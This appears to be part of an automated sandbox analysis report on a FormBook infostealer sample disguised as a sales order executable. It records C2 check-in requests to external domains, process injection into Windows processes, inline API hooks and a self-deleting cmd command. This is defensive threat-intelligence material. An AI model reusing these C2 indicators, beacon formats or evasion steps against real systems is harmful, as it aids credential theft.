SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T14:07:13.604938+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49730	TCP
2024-11-01T14:07:52.286999+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49736	TCP
2024-11-01T14:09:11.722171+0100	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50002	199.59.243.227	80	TCP
2024-11-01T14:09:11.722171+0100	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50002	199.59.243.227	80	TCP
2024-11-01T14:09:11.722171+0100	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50002	199.59.243.227	80	TCP
2024-11-01T14:09:32.405646+0100	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50003	216.239.32.52	80	TCP
2024-11-01T14:09:32.405646+0100	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50003	216.239.32.52	80	TCP
2024-11-01T14:09:32.405646+0100	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.4	50003	216.239.32.52	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 14:09:11.194890022 CET	50002	80	192.168.2.4	199.59.243.227
Nov 1, 2024 14:09:11.200602055 CET	80	50002	199.59.243.227	192.168.2.4
Nov 1, 2024 14:09:11.200701952 CET	50002	80	192.168.2.4	199.59.243.227
Nov 1, 2024 14:09:11.200793028 CET	50002	80	192.168.2.4	199.59.243.227
Nov 1, 2024 14:09:11.205660105 CET	80	50002	199.59.243.227	192.168.2.4
Nov 1, 2024 14:09:11.714071989 CET	50002	80	192.168.2.4	199.59.243.227
Nov 1, 2024 14:09:11.719969034 CET	80	50002	199.59.243.227	192.168.2.4
Nov 1, 2024 14:09:11.722171068 CET	50002	80	192.168.2.4	199.59.243.227
Nov 1, 2024 14:09:31.892076015 CET	50003	80	192.168.2.4	216.239.32.52
Nov 1, 2024 14:09:31.898422003 CET	80	50003	216.239.32.52	192.168.2.4
Nov 1, 2024 14:09:31.898654938 CET	50003	80	192.168.2.4	216.239.32.52
Nov 1, 2024 14:09:31.898746014 CET	50003	80	192.168.2.4	216.239.32.52
Nov 1, 2024 14:09:31.905217886 CET	80	50003	216.239.32.52	192.168.2.4
Nov 1, 2024 14:09:32.399243116 CET	50003	80	192.168.2.4	216.239.32.52
Nov 1, 2024 14:09:32.405529976 CET	80	50003	216.239.32.52	192.168.2.4
Nov 1, 2024 14:09:32.405646086 CET	50003	80	192.168.2.4	216.239.32.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 14:07:48.181421041 CET	63802	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:07:48.193178892 CET	53	63802	1.1.1.1	192.168.2.4
Nov 1, 2024 14:08:09.571980000 CET	63564	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:08:09.660111904 CET	53	63564	1.1.1.1	192.168.2.4
Nov 1, 2024 14:08:28.602884054 CET	49420	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:08:28.613985062 CET	53	49420	1.1.1.1	192.168.2.4
Nov 1, 2024 14:08:49.446813107 CET	54274	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:08:49.455573082 CET	53	54274	1.1.1.1	192.168.2.4
Nov 1, 2024 14:09:10.967401981 CET	62035	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:09:11.169971943 CET	53	62035	1.1.1.1	192.168.2.4
Nov 1, 2024 14:09:31.856239080 CET	60530	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:09:31.874373913 CET	53	60530	1.1.1.1	192.168.2.4
Nov 1, 2024 14:10:13.400392056 CET	55938	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:10:13.410598993 CET	53	55938	1.1.1.1	192.168.2.4
Nov 1, 2024 14:10:34.537101030 CET	49384	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:10:34.546467066 CET	53	49384	1.1.1.1	192.168.2.4
Nov 1, 2024 14:10:55.636576891 CET	53469	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:10:55.660073042 CET	53	53469	1.1.1.1	192.168.2.4
Nov 1, 2024 14:11:17.481321096 CET	60722	53	192.168.2.4	1.1.1.1
Nov 1, 2024 14:11:17.508454084 CET	53	60722	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 14:07:48.181421041 CET	192.168.2.4	1.1.1.1	0xd17f	Standard query (0)	www.lasterdeals.shop	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:09.571980000 CET	192.168.2.4	1.1.1.1	0xc47a	Standard query (0)	www.rkgexg.top	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:28.602884054 CET	192.168.2.4	1.1.1.1	0xec6a	Standard query (0)	www.ocockbowerlybrawer.cfd	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:49.446813107 CET	192.168.2.4	1.1.1.1	0x1a3b	Standard query (0)	www.ool-covers76.xyz	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:09:10.967401981 CET	192.168.2.4	1.1.1.1	0x5800	Standard query (0)	www.9net88.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:09:31.856239080 CET	192.168.2.4	1.1.1.1	0xa0b	Standard query (0)	www.yegle.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:13.400392056 CET	192.168.2.4	1.1.1.1	0xf92e	Standard query (0)	www.iscinddocenaemlynne.cfd	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:34.537101030 CET	192.168.2.4	1.1.1.1	0x91fe	Standard query (0)	www.zoc-marriage.xyz	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:55.636576891 CET	192.168.2.4	1.1.1.1	0x4c0d	Standard query (0)	www.ivglass.xyz	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:11:17.481321096 CET	192.168.2.4	1.1.1.1	0x1db5	Standard query (0)	www.pm-22-ns-2.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 14:07:48.193178892 CET	1.1.1.1	192.168.2.4	0xd17f	Name error (3)	www.lasterdeals.shop	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:09.660111904 CET	1.1.1.1	192.168.2.4	0xc47a	Name error (3)	www.rkgexg.top	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:28.613985062 CET	1.1.1.1	192.168.2.4	0xec6a	Name error (3)	www.ocockbowerlybrawer.cfd	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:08:49.455573082 CET	1.1.1.1	192.168.2.4	0x1a3b	Name error (3)	www.ool-covers76.xyz	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:09:11.169971943 CET	1.1.1.1	192.168.2.4	0x5800	No error (0)	www.9net88.net	94950.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 14:09:11.169971943 CET	1.1.1.1	192.168.2.4	0x5800	No error (0)	94950.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:09:31.874373913 CET	1.1.1.1	192.168.2.4	0xa0b	No error (0)	www.yegle.net	yegle.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 14:09:31.874373913 CET	1.1.1.1	192.168.2.4	0xa0b	No error (0)	yegle.net		216.239.32.52	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:09:31.874373913 CET	1.1.1.1	192.168.2.4	0xa0b	No error (0)	yegle.net		216.239.34.52	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:13.410598993 CET	1.1.1.1	192.168.2.4	0xf92e	Name error (3)	www.iscinddocenaemlynne.cfd	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:34.546467066 CET	1.1.1.1	192.168.2.4	0x91fe	Name error (3)	www.zoc-marriage.xyz	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:10:55.660073042 CET	1.1.1.1	192.168.2.4	0x4c0d	Name error (3)	www.ivglass.xyz	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 14:11:17.508454084 CET	1.1.1.1	192.168.2.4	0x1db5	Name error (3)	www.pm-22-ns-2.click	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.9net88.net

www.yegle.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50002	199.59.243.227	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 14:09:11.200793028 CET	165	OUT	GET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1 Host: www.9net88.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50003	216.239.32.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 14:09:31.898746014 CET	164	OUT	GET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1 Host: www.yegle.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Target ID:	0
Start time:	09:06:53
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\SALES ORDER875.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SALES ORDER875.exe"
Imagebase:	0x380000
File size:	1'396'736 bytes
MD5 hash:	6AC24DF0D8B58005679910E42981DBE8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	09:07:10
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SALES ORDER875.exe"
Imagebase:	0x8a0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	09:07:11
Start date:	01/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	09:07:14
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netsh.exe"
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	09:07:18
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	09:07:18
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true